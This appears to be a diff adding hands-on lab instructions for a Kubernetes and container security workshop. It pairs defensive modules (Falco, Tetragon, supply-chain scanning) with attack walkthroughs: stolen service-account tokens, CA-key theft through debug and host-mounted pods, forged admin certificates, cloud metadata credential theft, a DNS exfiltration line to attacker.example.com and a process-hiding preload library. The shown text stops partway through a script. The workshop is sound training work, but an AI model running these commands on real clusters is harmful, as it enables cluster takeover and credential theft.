+### Slide 120 - Lab Setup
+
+```
+ansible-playbook k8s-ansible-setup.yaml
+```
+
+
+### Slide 123 - Lab Scenario
+
+By now your Ansible playbook should have finished with no errors, if so great, if not, get our TA's attention.
+
+We need the to pretend we've compromised dev creds to Kubernetes, we'll do this by switching kubectl's context (contexts are often used when kubectl users have multiple clusters or accounts)
+```
+kubectl config use-context developer@kind-lab
+```
+
+### Slide 124 - Priv esc - to golden tickets (lab)
+
+What can it do?
+```
+kubectl auth can-i --list
+```
+
+Permissions on dev account seem to be very limited
+```
+kubectl get pods
+```
+There's one pod we seem to have access to...
+
+Let's exec into it. Change the `[rand]` below to match the random string in the pod name from the last command
+```
+kubectl exec -it myapp-[rand] -- /bin/bash
+```
+
+### Slide 125 - Priv esc - to golden tickets (lab cont.)
+
+Install some tools we'll need
+
+**Note:** we can do this because we're running in the container as root, otherwise we'd just pull in these tools some other way
+
+```
+apt update && apt install -y curl
+```
+
+```
+curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
+```
+
+chmod `kubectl` and move it to /usr/local/bin
+
+```
+chmod +x kubectl && mv kubectl /usr/local/bin
+```
+
+Use kubectl to see what we can do from this pod?
+
+```
+kubectl auth can-i --list
+```
+### Slide 126 - Priv esc - Why does this work?
+
+Look at the pod's service account K8S mounts inside the container
+
+```
+ls -l /var/run/secrets/kubernetes.io/serviceaccount/
+```
+
+### Slide 127 - Priv esc - to golden tickets (lab cont.)
+
+Get secrets
+
+```
+kubectl get secrets
+```
+
+Not much there, lets see if we can see secrets outside our namespace?
+
+```
+kubectl get secrets --all-namespaces
+```
+
+One of these looks interesting...
+
+```
+kubectl get secrets -n tracee-system | grep security
+```
+
+Let's try and get the service account token stored in this secret
+```
+kubectl -n tracee-system get secret security-svc-token -o json
+```
+
+For this command we used `-o json`, hence the output details in json, some cases makes it easier to parse
+
+### Slide 129 - Priv esc - to golden tickets (lab cont.)
+
+We need to get the token in a form we can use
+
+```
+export TOKEN=$(kubectl -n tracee-system get secret security-svc-token -o=jsonpath="{.data.token}" | base64 -d)
+```
+**Note:** The above command parses the field out of josn, and decodes the base64
+
+```
+echo $TOKEN
+```
+**Note:** Starts with eyJ which is the clue its a JSON Web Token, which is in base64 still (it was encoded twice), the eyJ is the first few characters in a JSON doc in base64. You can always `echo $TOKEN | base64 -d` if you want to see what the JSON looks like in a JWT
+
+```
+kubectl auth can-i --list
+```
+
+### Slide 130 - Priv esc to golden tickets (lab cont.)
+
+Let's try to use the token this time
+```
+kubectl auth can-i --list --token="$TOKEN"
+```
+
+This time `kubectl` used our stolen token, so now we're authenticating as the other service account with all the privileges. We'll have to make sure to include the TOKEN in future commands to keep using this account.
+
+The big thing you'll should notice in the command output is a * on resources on the same line as a * on verbs.
+Since you can do every verb on every resource, this is kind of like root/domain admin for Kubernetes.
+
+Let's find the API service pod, it'll be running in the kube-system namespace.
+
+```
+kubectl get pods -n kube-system --token="$TOKEN"
+```
+
+We're looking for the pod with "kube-apiserver-" in the name.
+
+Great let's steal the PKI private key off the api server pod and take over the cluster
+```
+kubectl --token="$TOKEN" -n kube-system exec kube-apiserver-lab-control-plane -- cat /etc/kubernetes/pki/ca.key
+```
+
+### Slide 132 - Priv esc to golden tickets (lab cont.)
+
+That last command doesn't work anymore, lets try something else...
+
+Let's 'debug' the control plane using a debug pod
+
+```
+kubectl debug node/lab-control-plane -it --image=ubuntu --token=$TOKEN
+```
+
+You now have a session in this special debug pod, it nicely mounts the host filesystem for us so you can "debug" it
+```
+cd /host
+```
+
+Now we can go after that CA private key for the PKI
+```
+cat etc/kubernetes/pki/ca.key
+```
+
+Copy and paste this to notepad or something for later
+
+Might as well grab the PKI CA cert too even though its already public its convenient.
+```
+cat etc/kubernetes/pki/ca.crt
+```
+
+Copy and paste this too
+
+
+### Slide 134 - CA keys - golden tickets (kill shot)
+
+Do this twice to back out of both shell instances (debug pod and pod you exec'ed to as developer account)
+```
+exit
+```
+
+Create a directory we can work with the certs in
+```
+mkdir ~/certs && cd ~/certs
+```
+
+Paste this line
+```
+cat << -EOF- > ca.key
+```
+Paste the contents of the the CA private key (ca.key) we grabbed earlier (the one starting with `-----BEGIN RSA PRIVATE KEY-----`)
+
+Paste the -EOF- string to signal to cat we're done
+```
+-EOF-
+```
+
+Normally cat reads files, but this is an easy way to paste contents into a file, in this case it is written to `ca.key` which is the same name as it had where we found it.
+
+**Note:** The -EOF- is a special string we specify to cat that we're done inputting. It can be any string, but normally, the convention is to use `EOF`, we only added dashes to either side on the off change the characters `EOF` together is a random part of the key.
+
+Do the same thing again with the CA public certificate, but to `ca.crt` file.
+
+```
+cat << -EOF- > ca.crt
+```
+
+Paste the contents of ca.crt (the one starting with -----BEGIN CERTIFICATE-----)
+
+Paste or type (carefully) the -EOF- string.
+```
+-EOF-
+```
+
+Check both files were written to successfully
+```
+cat ca.key ca.crt
+```
+
+You should see the output display the private key first with both lines saying BEGIN/END RSA PRIVATE KEY respectively, followed by the certificate starting ending with the BEGIN/END CERTIFICATE lines respectively and all 5 dashes on each end, etc.
+
+Abridged Example:
+
+```
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpQIBAAKCAQEAvolMNLYvhQHr0xq+bJg/dpwzqF4QkW+4fF0+o5W0I/3sO/6Q
+XZTw6dQgdNbr7kXUqICsM+sKupU5swWBVzVgz6CXroxBVgthfQwzUWkxJv5GWSJj
+C2vlv/7uaxlUbTSCTVzBpzbbucz0kMyBth+lo8FT/1Mv/9hEjPWOhBHpHT2OPnc3
+qeBCE+qM3Ams0WyuYInUHZ9J2F9uh26mjjkU6fGboEcY0wYjmVO6gzslQazuyDdQ
+hWXNg7tEhiz/1iNuNS09vS6nuvXqkKZZvOWgr4KB93vJt4mvvn+Zfcbm+SR6OzYq
+aRjDGK32iyLrzHpYWU+z52gjczSj/1RpWU7K7EP64HtpaXqG5jktsNNw+B6lmWt5
+a88i2x+U+JMsaKhBKWakYFhDMTWBzD/GSYat06Ko+Mx2ySyPhZr77fvqJ5dyBa5c
++u9ikA8fk2IDOZgA74ocORHr1r4deIsz8G3cU6x9Z/7AT+ay6fhVt0E=
+-----END RSA PRIVATE KEY-----
+-----BEGIN CERTIFICATE-----
+MIIBpzCCAU2gAwIBAgIBADAKBggqhkjOPQQDAjA7MRwwGgYDVQQKExNkeW5hbWlj
+bGlzdGVuZXItb3JnMRswGQYDVQQDExJkeW5hbWljbGlzdGVuZXItY2EwHhcNMjIw
+NDIwMjAzNzQ5WhcNMzIwNDE3MjAzNzQ5WjA7MRwwGgYDVQQKExNkeW5hbWljbGlz
+dGVuZXItb3JnMRswGQYDVQQDExJkeW5hbWljbGlzdGVuZXItY2EwWTATBgcqhkjO
+PQIBBggqhkjOPQMBBwNCAASOdvgi0R6lXNcCZAQcF1GNSEaEookyiMe8/hI8vmQD
+MzBQMgSvo4e0L1HAuOoiI3U4lY89d+o5ms5inXxZgAKko0IwQDAOBgNVHQ8BAf8E
+HVSrrIEwCgYIKoZIzj0EAwIDSAAwRQIhAPZDT7THv4l3+icQ4o9Wb4m6+2x5KCae
+aqxwiPwccDGGAiA1PMao7JoSfYr27NL3QKbGo3NLtv0G5fZpLccJ/cq3qw==
+-----END CERTIFICATE-----
+```
+
+### Slide 135 - CA keys - golden tickets (kill shot)
+
+
+Now we need to generate a private key for our "user" we're going to impersonate
+```
+openssl genrsa -out user.key 2048
+```
+
+Create a CSR (Certificate Signing Request) and in the subject field, we specify the username as a CN (Common Name) and the group as a O (Organization).
+```
+openssl req -new -key user.key -subj "/CN=kubernetes-admin/O=system:masters" -out user.csr
+```
+
+Normally you'd send the CSR to your Certificate Authority to sign it with their private key, and whose signature can be verified with their public cert, but we have the private CA key, so now we are the CA so we'll sign our own request.
+Since, we have the private key and a copy of the public cert, we can now sign this CSR as the Kubernetes CA.
+```
+openssl x509 -req -in user.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out user.crt -days 1024 -sha256
+```
+
+The signed cert is output to user.crt
+
+We can now import the cert into our .kube/config file for use by `kubectl`
+```
+kubectl config set-credentials kubernetes-admin --client-certificate=user.crt --client-key=user.key --embed-certs
+```
+Now we'll create a context that'll use the credentials and uses the existing cluster settings
+```
+kubectl config set-context k8s-admin@hacked-cluster --user=kubernetes-admin --cluster kind-lab
+```
+
+Finally, we'll switch `kubectl` to use the new context.
+
+```
+kubectl config use-context k8s-admin@hacked-cluster
+```
+
+You can test out your access, you're still admin, but now its as the cluster admin account you were using before switching to the developer accoount, just with a second certificate.
+```
+kubectl auth can-i --list
+```
+
+You can just keep using this new signed client certificate since its for the same user.
+
+### Slide 139 - Evil Pod (lab)
+
+Let's go back to the original scenario but this time the pod and special service account didn't exist.
+```
+kubectl delete deployment myapp -n pls-dont-hack-me
+```
+
+```
+kubectl delete serviceaccount read-secrets -n pls-dont-hack-me
+```
+
+**Note:** Notice you did that as kubernetes-admin account but with the context using your forged certificate
+
+Now lets go back to pretending we've compromised the developer's credentials and switch to using them.
+
+```
+kubectl config use-context developer@kind-lab
+```
+Let's go back to the home directory
+```
+cd ~
+```
+
+You now no longer have a priv esc to exploit, but there's often another trick.
+
+Let's take a look at a special pod manifest
+```
+cat k8s-manifests/evilpod.yaml
+```
+
+Note the nodeName and volume mounts.
+
+### Slide 141 - Evil Pod (Lab Cont.)
+
+Let's create this pod and deploy it on the controlplane node.
+```
+kubectl apply -f k8s-manifests/evilpod.yaml
+```
+**Note:** You cloud also run `create` instead of `apply` but apply will create if it doesn't exist and modify the pod specifications to match the manifest and restart it, if it does.
+
+Now that the pod's running, we can run a simple command to steal the key from the host volume mounted inside of it.
+```
+kubectl exec -it -n pls-dont-hack-me evil-pod -- cat /controlplane/etc/kubernetes/pki/ca.key
+```
+
+Much more straight forward way of getting to the control plane as developer, that often works in Kubernetes nodes without Admissions Controller checks.
+
+### Slide 145 - Cleanup
+
+Switch back to original account/context
+```
+kubectl config use-context kind-lab
+```
+
+Verify your admin rights are back (look for * on resources and verbs)
+```
+kubectl auth can-i --list
+```
+
+This is optional, but run apply these manifests if you want to put back the service account and pod used in the priv esc lab if you want to do it again later.
+
+```
+kubectl apply -f k8s-manifests/serviceaccounts.yaml
+```
+
+```
+kubectl apply -f k8s-manifests/pods.yaml
+```
+
+You can run this to delete the evilpod since you're done with it.
+```
+kubectl delete -f k8s-manifests/evilpod.yaml
+```
+
+### Slide 151 - Ex: Cloud Metadata attacks
+
+Execute a pod in our lab with heavily restricted permissions.
+
+```
+kubectl apply -f k8s-manifests/nothingallowedpod.yaml --namespace lab-namespace
+```
+
+Start a shell in our restricted pod
+
+```
+kubectl exec -it nothing-allowed-exec-pod -n lab-namespace -- bash
+```
+
+```
+curl -H "Metadata-Flavor: Google" 'http://metadata/computeMetadata/v1/instance/'
+```
+
+```
+curl -H "Metadata-Flavor: Google" 'http://metadata/computeMetadata/v1/instance/id' -w "\n"
+```
+
+```
+curl -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
+```
+
+```
+curl -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes
+```
+
+### Slide 155 - Play with Prometheus/Grafana
+
+```
+export WORKER1=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' lab-worker)
+```
+
+Create a tunnel for Grafana:
+```
+ngrok http $WORKER1:31000 --oauth=google --oauth-allow-email=@gmail.com
+```
+
+Open the ngrok provided URL
+
+Click through the warning message, login with your Google Account matching the email you provided in the ngrok command
+
+You now have access to your Grafana Dashboard from the internet
+
+>Note: If you're having issues using Google for OAuth, you can fall back to basic auth protocol and specify your own user/password.
+```
+#Example of basic auth
+ngrok http $WORKER1:31000 --basic-auth="user:password123"
+```
+
+Grafana Credentials
+
+Username:
+```
+admin
+```
+Password:
+```
+prom-operator
+```
+
+Commands for other services (if you want to explore later outside of workshop):
+
+Prometheus Tunnel:
+```
+ngrok http $WORKER1:30000 --oauth=google --oauth-allow-email=@gmail.com
+```
+
+AlertManager:
+```
+ngrok http $WORKER1:32000 --oauth=google --oauth-allow-email=@gmail.com
+```
+
+
+### Slide 157 - Tracee events in Grafana
+
+Navigate:
+Top right Hamburger menu → Explore
+
+
+
+Switch Prometheus in the top left to Loki
+
+
+
+On the left side you'll see an option for Builder or Code, select Code.
+
+
+
+Paste this query into the query bar and click Run Query
+```
+{namespace="tracee-system"} |= `matchedPolicies` != `sshd` | json | line_format "{{.log}}"
+```
+Narrow down results to your own activity.
+```
+{namespace="tracee-system"} |= `matchedPolicies` != `sshd` | json | line_format "{{.log}}" | hostName !~ `juice-shop-.*`
+```
+
+
+**Adding the Dashboard**
+
+Under top-left menu hamburger menu → Dashboards
+
+Select New → Import
+
+In another tab, open the link below and copy the json from there
+
+```
+https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/grafana/tracee-dashboard.json
+```
+
+Paste the json in the text box labeled 'Import via panel json'
+
+Click the `[Load]` button
+
+## Module 8 - Supply Chain Security
+
+This module covers how attackers compromise the container supply chain and how defenders can detect and prevent it using modern tooling.
+
+### Exercise: Image Inspection with crane
+
+`crane` is a tool for interacting with container registries and image layers — a modern replacement for tools like `whaler`.
+
+Pull and inspect an image's manifest:
+```
+crane manifest ubuntu:22.04 | jq
+```
+
+List the layers in an image:
+```
+crane ls ubuntu
+```
+
+Note: Tags like `:latest` are mutable. An attacker can push a new image to the same tag. Let's see the digest (immutable reference):
+```
+crane digest ubuntu:22.04
+```
+
+Export the filesystem of an image to inspect layers locally:
+```
+mkdir /tmp/crane-export && crane export ubuntu:22.04 /tmp/crane-export/ubuntu.tar
+```
+
+```
+tar -tf /tmp/crane-export/ubuntu.tar | head -30
+```
+
+Compare this to our earlier `docker save` + `tar` approach — `crane` doesn't require Docker daemon access.
+
+### Exercise: SBOM Generation with syft
+
+Generate a Software Bill of Materials (SBOM) for an image:
+```
+syft ubuntu:22.04
+```
+
+Output in SPDX format (industry standard):
+```
+syft ubuntu:22.04 -o spdx-json > /tmp/ubuntu-sbom.json
+```
+
+Now generate an SBOM for our juice-shop image (a more interesting target):
+```
+syft bkimminich/juice-shop -o cyclonedx-json > /tmp/juiceshop-sbom.json
+```
+
+```
+cat /tmp/juiceshop-sbom.json | jq '.components | length'
+```
+
+Note the number of dependencies — each one is a potential attack surface.
+
+### Exercise: Vulnerability Scanning with grype
+
+Scan an image for known CVEs:
+```
+grype ubuntu:22.04
+```
+
+Scan using a pre-generated SBOM:
+```
+grype sbom:/tmp/juiceshop-sbom.json
+```
+
+Filter for critical/high severity:
+```
+grype bkimminich/juice-shop --only-fixed --fail-on critical
+```
+
+The `--fail-on` flag is useful in CI/CD pipelines to gate deployments.
+
+### Exercise: Image Signing with cosign (Sigstore)
+
+Generate a key pair for signing:
+```
+cosign generate-key-pair
+```
+
+This creates `cosign.key` (private) and `cosign.pub` (public).
+
+**Note:** To actually sign and push, you'd need a writable registry. For demo purposes, let's verify signatures on public images:
+
+```
+cosign verify --key https://registry.npmjs.org/-/npm/v1/keys alpine:latest 2>&1 || echo "Not signed with this key (expected)"
+```
+
+Verify a known-signed image (distroless is signed by Google):
+```
+cosign verify gcr.io/distroless/static:latest --certificate-identity-regexp='.*' --certificate-oidc-issuer-regexp='.*' 2>&1 | head -20
+```
+
+### Exercise: Malicious Image Pipeline
+
+Let's combine `crane`, `syft`, and `grype` to analyze the `mkefi/dropboxservice` image we looked at earlier:
+
+```
+crane manifest mkefi/dropboxservice | jq '.layers | length'
+```
+
+```
+syft mkefi/dropboxservice -o table
+```
+
+```
+grype mkefi/dropboxservice
+```
+
+What vulnerabilities exist? How old are the base image packages? This is the kind of pipeline you'd run in CI/CD or as part of an image admission policy.
+
+### Exercise: Tag Mutability Attack
+
+Demonstrate why pinning by tag is not the same as pinning by digest:
+
+```
+crane digest ubuntu:22.04
+```
+
+Note this digest. Now imagine an attacker with write access to the registry pushes a trojanized image to the same `:22.04` tag. The digest would change, but any Dockerfile or manifest referencing `ubuntu:22.04` would pull the new (malicious) image.
+
+The fix: pin by digest in production:
+```
+# Instead of:
+# image: ubuntu:22.04
+# Use:
+# image: ubuntu@sha256:
+```
+
+---
+
+## Module 9 - Modern Runtime Security
+
+This module deploys and compares three eBPF-based runtime security tools: Tracee, Falco, and Tetragon.
+
+### Exercise: Tracee (Updated)
+
+Tracee should already be running in the cluster from the ansible setup. Let's verify:
+
+```
+kubectl get pods -n tracee-system
+```
+
+Run the Tracee tester to generate known-detectable events:
+```
+kubectl apply -f k8s-manifests/pods.yaml
+```
+
+```
+kubectl logs -n tracee-system -l app.kubernetes.io/name=tracee --tail=50 | grep matchedPolicies
+```
+
+You can also run Tracee standalone in Docker for host-level monitoring:
+```
+docker run --name tracee -d --rm --pid=host --cgroupns=host --privileged \
+ -v /etc/os-release:/etc/os-release-host:ro \
+ -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \
+ aquasec/tracee:latest
+```
+
+```
+docker logs tracee --follow 2>&1 | grep MatchedPolicies
+```
+
+### Exercise: Falco
+
+Falco should already be running from the ansible setup. Let's verify:
+
+```
+kubectl get pods -n falco-system
+```
+
+Check Falco logs for any alerts it's already generated:
+```
+kubectl logs -n falco-system -l app.kubernetes.io/name=falco --tail=30
+```
+
+Now let's trigger some Falco rules. Launch a privileged container:
+```
+docker run -it --privileged --rm ubuntu:22.04 /bin/bash -c "cat /etc/shadow; exit"
+```
+
+Check Falco logs again — you should see alerts for reading sensitive files:
+```
+kubectl logs -n falco-system -l app.kubernetes.io/name=falco --tail=10
+```
+
+#### Custom Falco Rules for Container Escape Detection
+
+Create a custom Falco rules file:
+```
+cat << 'EOF' > /tmp/custom-falco-rules.yaml
+customRules:
+ custom-rules.yaml: |-
+ - rule: Container Escape via Mount
+ desc: Detect attempts to mount host filesystem from within a container
+ condition: >
+ spawned_process and container and
+ proc.name in (mount, umount) and
+ not proc.pname in (dockerd, containerd)
+ output: >
+ Container escape attempt via mount
+ (user=%user.name command=%proc.cmdline container=%container.name
+ image=%container.image.repository)
+ priority: CRITICAL
+ tags: [container, escape]
+
+ - rule: Suspicious kubectl in Container
+ desc: Detect kubectl execution inside a container
+ condition: >
+ spawned_process and container and
+ proc.name = kubectl
+ output: >
+ kubectl executed inside container
+ (user=%user.name command=%proc.cmdline container=%container.name
+ image=%container.image.repository)
+ priority: WARNING
+ tags: [container, lateral_movement]
+EOF
+```
+
+Upgrade Falco with custom rules:
+```
+helm upgrade falco falcosecurity/falco \
+ --namespace falco-system \
+ --reuse-values \
+ --values /tmp/custom-falco-rules.yaml
+```
+
+#### Falcosidekick Web UI
+
+Falcosidekick provides a web UI for viewing alerts. Let's access it:
+```
+export WORKER1=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' lab-worker)
+```
+
+```
+kubectl port-forward svc/falco-falcosidekick-ui -n falco-system 2802:2802 &
+```
+
+Or via ngrok:
+```
+ngrok http $WORKER1:2802 --basic-auth="admin:password123"
+```
+
+### Exercise: Tetragon
+
+Tetragon should already be running. Verify:
+
+```
+kubectl get pods -n tetragon
+```
+
+Check Tetragon events:
+```
+kubectl logs -n tetragon -l app.kubernetes.io/name=tetragon -c export-stdout --tail=20
+```
+
+#### TracingPolicy CRDs
+
+Tetragon uses TracingPolicy CRDs for custom security policies. Create one to monitor file access:
+
+```
+cat << 'EOF' | kubectl apply -f -
+apiVersion: cilium.io/v1alpha1
+kind: TracingPolicy
+metadata:
+ name: monitor-sensitive-files
+spec:
+ kprobes:
+ - call: "security_file_open"
+ syscall: false
+ args:
+ - index: 0
+ type: "file"
+ selectors:
+ - matchArgs:
+ - index: 0
+ operator: "Prefix"
+ values:
+ - "/etc/shadow"
+ - "/etc/kubernetes/pki"
+ - "/var/run/secrets/kubernetes.io"
+EOF
+```
+
+Now trigger it by reading a sensitive file from a pod:
+```
+kubectl exec -it -n pls-dont-hack-me evil-pod -- cat /controlplane/etc/shadow 2>/dev/null || echo "Pod not running yet"
+```
+
+Check Tetragon logs for the file access event:
+```
+kubectl logs -n tetragon -l app.kubernetes.io/name=tetragon -c export-stdout --tail=10 | jq 'select(.process_kprobe != null)'
+```
+
+#### Create a Network Monitoring Policy
+
+```
+cat << 'EOF' | kubectl apply -f -
+apiVersion: cilium.io/v1alpha1
+kind: TracingPolicy
+metadata:
+ name: monitor-network-connections
+spec:
+ kprobes:
+ - call: "tcp_connect"
+ syscall: false
+ args:
+ - index: 0
+ type: "sock"
+EOF
+```
+
+### Exercise: Comparing Detection Tools
+
+Now let's compare all three tools by running the same attack and seeing what each one detects.
+
+**The Attack:** Execute kubectl inside a compromised pod (simulating lateral movement)
+
+First, make sure you're using the admin context:
+```
+kubectl config use-context kind-lab
+```
+
+Deploy the attack:
+```
+kubectl exec -it myapp- -n pls-dont-hack-me -- /bin/bash -c "apt update -qq && apt install -y -qq curl > /dev/null 2>&1 && curl -sLO 'https://dl.k8s.io/release/v1.31.4/bin/linux/amd64/kubectl' && chmod +x kubectl && ./kubectl auth can-i --list"
+```
+
+Now check each tool's output:
+
+**Tracee:**
+```
+kubectl logs -n tracee-system -l app.kubernetes.io/name=tracee --tail=20 | grep -i kubectl
+```
+
+**Falco:**
+```
+kubectl logs -n falco-system -l app.kubernetes.io/name=falco --tail=20 | grep -i kubectl
+```
+
+**Tetragon:**
+```
+kubectl logs -n tetragon -l app.kubernetes.io/name=tetragon -c export-stdout --tail=20 | jq 'select(.process_exec.process.binary | contains("kubectl"))'
+```
+
+| Tool | Strengths | Focus |
+|------|-----------|-------|
+| Tracee | Signature-based detection, built-in rules | Known attack patterns |
+| Falco | Rich rule language, ecosystem (Sidekick) | Runtime policy enforcement |
+| Tetragon | Kernel-level tracing, CRD-based policies | Deep observability, enforcement |
+
+### Viewing Runtime Security in Grafana
+
+Navigate to Grafana (same as before):
+```
+export WORKER1=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' lab-worker)
+ngrok http $WORKER1:31000 --basic-auth="admin:password123"
+```
+
+In Grafana, go to Explore → Loki and use these queries:
+
+**Tracee events:**
+```
+{namespace="tracee-system"} |= `matchedPolicies` != `sshd` | json | line_format "{{.log}}"
+```
+
+**Falco events:**
+```
+{namespace="falco-system"} | json | line_format "{{.log}}"
+```
+
+**Tetragon events:**
+```
+{namespace="tetragon"} | json | line_format "{{.log}}"
+```
+
+---
+
+## Module 10 - Cloud-Native & Managed K8s Attacks
+
+This module covers attacks specific to cloud-hosted Kubernetes environments.
+
+### Exercise: IMDS Attacks
+
+The Instance Metadata Service (IMDS) is available on cloud VMs and can be queried from within pods to steal cloud credentials.
+
+Deploy the IMDS demo pod:
+```
+kubectl apply -f k8s-manifests/imds-demo-pod.yaml
+```
+
+```
+kubectl exec -it imds-attack-pod -n pls-dont-hack-me -- /bin/sh
+```
+
+**GCP IMDS (v1 - no token required):**
+```
+curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/id -w "\n"
+```
+
+```
+curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
+```
+
+```
+curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes
+```
+
+**AWS IMDSv1 (deprecated, still often available):**
+```
+curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ -w "\n"
+```
+
+**AWS IMDSv2 (token-based):**
+```
+TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
+curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
+```
+
+**Azure IMDS:**
+```
+curl -s -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
+```
+
+**Note:** In our kind lab, these endpoints won't be available (no cloud metadata service). On a real cloud VM (like the GCP one from lab setup), the GCP commands will work. The key takeaway: any pod with network access can potentially reach IMDS and steal cloud credentials.
+
+```
+exit
+```
+
+#### Blocking IMDS with Network Policies
+
+You can block IMDS access at the network level:
+
+```
+cat << 'EOF' | kubectl apply -f -
+apiVersion: networking.k8s.io/v1
+kind: NetworkPolicy
+metadata:
+ name: block-imds
+ namespace: pls-dont-hack-me
+spec:
+ podSelector: {}
+ policyTypes:
+ - Egress
+ egress:
+ # Allow all egress EXCEPT the metadata IP
+ - to:
+ - ipBlock:
+ cidr: 0.0.0.0/0
+ except:
+ - 169.254.169.254/32
+EOF
+```
+
+### Exercise: DNS Exfiltration from "Isolated" Pods
+
+Even with strict network policies, DNS is almost always allowed (pods need it to resolve service names). This makes it an exfiltration channel.
+
+Apply the network policy demo manifests:
+```
+kubectl apply -f k8s-manifests/network-policy-demo.yaml
+```
+
+Exec into the network-policy test pod:
+```
+kubectl exec -it netpol-test-pod -n pls-dont-hack-me -- /bin/sh
+```
+
+Try a normal HTTP request (should fail with default-deny egress):
+```
+curl -s --max-time 5 http://example.com || echo "Blocked by network policy (expected)"
+```
+
+But DNS still works:
+```
+nslookup kubernetes.default.svc
+```
+
+Simulate DNS exfiltration — encode data as a DNS query:
+```
+nslookup $(echo "secret-data" | base64 | tr '+/' '-_').attacker.example.com 2>/dev/null || echo "DNS query sent (check your DNS server logs)"
+```
+
+The key insight: network policies that allow DNS (UDP/TCP 53) create an exfiltration channel. Mitigations include DNS-aware network policies (Cilium) or DNS monitoring.
+
+```
+exit
+```
+
+### Exercise: Managed K8s Attack Surfaces
+
+#### EKS: IRSA (IAM Roles for Service Accounts) Abuse
+
+In AWS EKS, pods can assume IAM roles through IRSA. The token is projected into the pod:
+```
+# On a real EKS cluster, you'd find these:
+# /var/run/secrets/eks.amazonaws.com/serviceaccount/token (OIDC token)
+# AWS_ROLE_ARN environment variable
+# AWS_WEB_IDENTITY_TOKEN_FILE environment variable
+```
+
+An attacker with pod access can use the projected token to assume the IAM role and access AWS services. The fix: use least-privilege IAM policies and Pod Identity (the newer replacement for IRSA).
+
+#### GKE: Workload Identity Federation
+
+In GKE, Workload Identity maps K8s service accounts to GCP service accounts:
+```
+# On a real GKE cluster with Workload Identity:
+curl -s -H "Metadata-Flavor: Google" \
+ "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
+# Returns a GCP access token scoped to the mapped service account
+```
+
+The fix: use fine-grained IAM bindings and audit Workload Identity mappings.
+
+#### Cleanup
+
+```
+kubectl delete -f k8s-manifests/network-policy-demo.yaml
+kubectl delete -f k8s-manifests/imds-demo-pod.yaml
+```
+
+---
+
+## Appendix
+
+
+### Slide 161 - Exercise: Libprocess hider lab
+
+#### This lab was part of our original workshop, but eBPF and other changes like observability sitting outside namespace have made it irrelevant. That said, it's still a fun exercise and shows off some cool LoL techniques for data exfil.
+
+Let's go back to our cmddemo Dockerfile
+```
+cd ~/imagetest
+```
+```
+git clone https://github.com/gianlucaborello/libprocesshider
+```
+```
+cd libprocesshider && vi processhider.c
+```
+
+Change this:
+```
+/*
+ * Every process with this name will be excluded
+ */
+static const char* process_to_filter = "evil_script.py";
+```
+to this (use `i` to enter insert mode in vi):
+```
+static const char* process_to_filter = "sleep";
+```
+> After changing, hit `[ESC]`, then type `:wq`
+
+Compile:
+```
+make
+```
+
+### Slide 162 - Libprocess hider lab (cont.)
+
+```
+cd ..
+```
+We're going to update the Dockerfile from our cmddemo to do more things
+```
+vi Dockerfile
+```
+We're going to add 4 new lines
+
+>Reminder about vi: `i` for insert mode to edit text, use arrow keys to navigate, `[ESC]` to exit insert mode, `:wq` to save(write to file) and quit
+
+Between these two lines
+```
+RUN apt update && apt upgrade -y && apt install -y curl tini
+COPY ./docker-entrypoint.sh /docker-entrypoint.sh
+```
+Add:
+```
+COPY ./libprocesshider/libprocesshider.so /usr/local/lib/libso5.so
+RUN echo "/usr/local/lib/libso5.so" >> /etc/ld.so.preload
+```
+This copies in the library we just compiled and adds an entry to the ld.so.preload file to load it during "preload"
+
+Between these two lines
+```
+ENV USER HANDLE
+ENTRYPOINT ["/usr/bin/tini", "--", "/docker-entrypoint.sh"]
+```
+add and replace PASSWORD with one you made up:
+```
+# Replace password with a unique one of your own
+ENV PW PASSWORD
+```
+
+When is all done, your Dockerfile should look like this.
+
+```
+FROM ubuntu:22.04
+RUN groupadd -g 999 usertest && \
+useradd -r -u 999 -g usertest usertest
+RUN apt update && apt upgrade -y && apt install -y curl tini
+COPY ./libprocesshider/libprocesshider.so /usr/local/lib/libso5.so
+RUN echo "/usr/local/lib/libso5.so" >> /etc/ld.so.preload
+COPY ./docker-entrypoint.sh /docker-entrypoint.sh
+RUN chmod +x /docker-entrypoint.sh
+USER usertest
+# Go to pipedream.com and get an HTTP endpoint URL, replace below
+ENV URL PIPEDREAM_URL
+ENV UA "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.7) Gecko/20070917 BonEcho/2.0.0.7"
+# Replace HANDLE with your l33t hacker name or some other identifying designation
+ENV USER HANDLE
+# Replace password with a unique one of your own
+ENV PW PASSWORD
+ENTRYPOINT ["/usr/bin/tini", "--", "/docker-entrypoint.sh"]
+```
+> After pasting, hit `[ESC]`, then type `:wq`
+
+### Slide 163 - Libprocess hider lab (cont.)
+
+>`[ESC]` then type `:wq` if you haven't already from last slide
+
+We're also going to edit the docker-entrypoint.sh file, it's easier to just replace the whole thing.
+```
+vi docker-entrypoint.sh
+```
+
+>vi Tip: just hit `dd` repeatedly to delete whole lines, then go into insert mode and paste the contents below
+```
+#!/usr/bin/env bash
+
+if [ "shell" = "${1}" ]; then
+ /bin/bash
+else
+ while true
+ do
+ sleep 30
